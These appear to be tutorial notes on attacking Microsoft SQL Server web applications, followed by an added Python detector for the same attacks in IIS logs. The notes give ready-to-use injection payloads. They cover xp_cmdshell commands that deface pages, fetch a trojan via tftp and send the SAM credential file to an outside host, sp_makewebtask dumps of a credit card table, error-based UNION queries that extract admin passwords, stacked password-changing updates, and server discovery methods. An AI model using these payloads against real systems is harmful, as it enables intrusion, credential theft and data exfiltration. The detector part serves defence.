using sql server stored procedures
…
executing operating system commands
Use stored procedures such as master..xp_cmdshell
Syntax is as follows: blah' ; exec master..xp_cmdshell "<os command>"
ps: if a single quote does not work, a double quote can be used
ex:
ping a server
blah' ; exec master..xp_cmdshell "ping 10.1.2.3" --
list directory files
blah' ; exec master..xp_cmdshell "dir c:*.*/s > c:\directory.txt" --
create a file
blah' ; exec master..xp_cmdshell "echo hello > c:\hello.txt" --
defacing a web page
blah' ; exec master..xp_cmdshell "echo you-are-defaced > c:\inetpub\www\root\index.htm" --
execute non-gui applications
blah' ; exec master..xp_cmdshell "cmd.exe /c appname.exe" --
upload a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.3 GET trojan.exe c:\trojan.exe" --
download a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.1 PUT c:\winnt\repair\SAM SAM" --
…..
use sp_makewebtask to write a query into an html
sp_makewebtask is a stored procedure included with SQL Server.
It is used to obtain a web shell; its main function is to export the records of a database table to a file.
Syntax is as follows: blah' ; exec master..sp_makewebtask "webpage","sql command"
ex:
Output the creditcard table to a web page: blah' ; exec master..sp_makewebtask "\\10.10.1.4\share\creditcard.html","select * from creditcard"
…..
getting data from the database using odbc error message
Use specially crafted SQL queries to force MS SQL Server to return the needed information, such as table names and column names, in its error messages
using the UNION clause
Syntax is roughly: http://web/page.asp?var=value "UNION subquery"
The system produces an error message that discloses information according to the UNION subquery
The operation is roughly: http://www.web.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
When the user UNIONs this string value to the integer 10, SQL Server attempts to convert the string (nvarchar) to an integer. Because converting nvarchar to int is not possible for this value, the conversion fails and the server produces an error. The server displays the following error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
This error message reveals that the first table name is table1
UNION subquery examples:
Make the system reveal the second table name: UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN('table1')--
If the error message output contains ...the nvarchar value 'admin_name' to a column..., the table name is admin_name
Using LIKE, the following makes the system reveal the first table name containing "login": UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME like '%25LOGIN%25'--
If the error message output contains ...the nvarchar value 'admin_login' to a column..., the table name is admin_login
Make the system reveal the first column of admin_login: UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
If the error message output contains ...the nvarchar value 'login_id' to a column..., the column name is login_id
Make the system reveal the second column of admin_login: UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN('login_id')--
If the error message output contains ...the nvarchar value 'login_name' to a column..., the column name is login_name
Make the system reveal the first login_name value in the admin_login table: UNION SELECT TOP 1 login_name FROM admin_login --
If the error message output contains ...the nvarchar value 'ray' to a column..., the first login_name value is ray
Make the system reveal the password value in the admin_login table where login_name is ray: UNION SELECT TOP 1 password FROM admin_login where login_name='ray'--
If the error message output contains ...the nvarchar value 'ixtr3n' to a column..., ray's password is ixtr3n
ps:
INFORMATION_SCHEMA.TABLES: contains information about all tables in the server
…..
update/insert data into the database
Syntax is roughly: http://web/page.asp?var=value;"update or insert sql query"
ex: http://www.web.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'goodjob' WHERE login_name='ray' --
http://www.web.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id','login_name','password') VALUES(123,'ray','goodjob') --
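As an added example (not part of the original notes), a Python detector that flags the request patterns covered in the sections above (xp_cmdshell and sp_makewebtask calls, UNION ... INFORMATION_SCHEMA enumeration, and stacked UPDATE/INSERT statements) in web server logs. The IIS-style log lines and the rule names are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style W3C log lines (date time cs-uri-stem cs-uri-query sc-status).
# Sample data made up for this example; the payload shapes mirror the notes above.
SAMPLE_LOG = """\
2024-01-05 10:00:01 /index.asp id=10 200
2024-01-05 10:00:07 /index.asp id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- 500
2024-01-05 10:00:12 /index.asp id=blah';exec%20master..xp_cmdshell%20"dir"-- 500
2024-01-05 10:00:20 /index.asp id=10;%20UPDATE%20admin_login%20SET%20password='x'-- 200
2024-01-05 10:00:25 /page.asp var=hello%20world 200
"""

# One rule per technique in the notes; the names are this example's own labels.
RULES = [
    ("xp_cmdshell",    re.compile(r"\bxp_cmdshell\b", re.I)),
    ("sp_makewebtask", re.compile(r"\bsp_makewebtask\b", re.I)),
    ("union-enum",     re.compile(r"\bUNION\b.*\bSELECT\b.*\bINFORMATION_SCHEMA\b", re.I)),
    ("stacked-write",  re.compile(r";\s*(UPDATE|INSERT)\b", re.I)),
    ("comment-tail",   re.compile(r"--\s*$")),
]

def scan_log(text):
    """Return one finding per request that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        _date, time, stem, query, status = line.split(" ", 4)
        decoded = unquote_plus(query)            # payloads arrive URL-encoded
        matched = [name for name, rx in RULES if rx.search(decoded)]
        if matched:
            findings.append({"time": time, "uri": stem, "status": int(status),
                             "rules": matched, "query": decoded})
    return findings

def is_error_based(finding):
    """UNION enumeration that ended in a 500 matches the ODBC conversion-error pattern."""
    return "union-enum" in finding["rules"] and finding["status"] == 500

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        tag = " (error-based enumeration)" if is_error_based(f) else ""
        print(f["time"], f["uri"], f["rules"], tag)
```

A request that trips union-enum together with a 500 response is the signature of the nvarchar-to-int error disclosure described above; a generic error page on the web tier removes the disclosure even when the injection itself is not yet fixed.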
………………………………………………………………………………………………..
attacking sql servers
Methods include:
SSRS
osql -L probe
sc.exe
port scanning
use of commercial alternatives
…
SSRS(sql server resolution service)
The service is responsible for sending a response packet containing the connection details to clients who send a specially formed request
The packet contains the details necessary to connect to the desired instance, including the TCP port
Uses UDP port 1434
SSRS buffer overflow vulnerabilities:
allow remote attackers to overwrite portions of the system's memory and execute arbitrary code
…
osql -L probe
A command-line utility provided by Microsoft with SQL Server 2000
Allows the user to issue queries to the server
Use: list servers
…
sc.exe
The Service Control command makes it possible to query servers to see if they are offering SQL Server services
Use: sweeping for services, to check whether the remote host is running SQL Server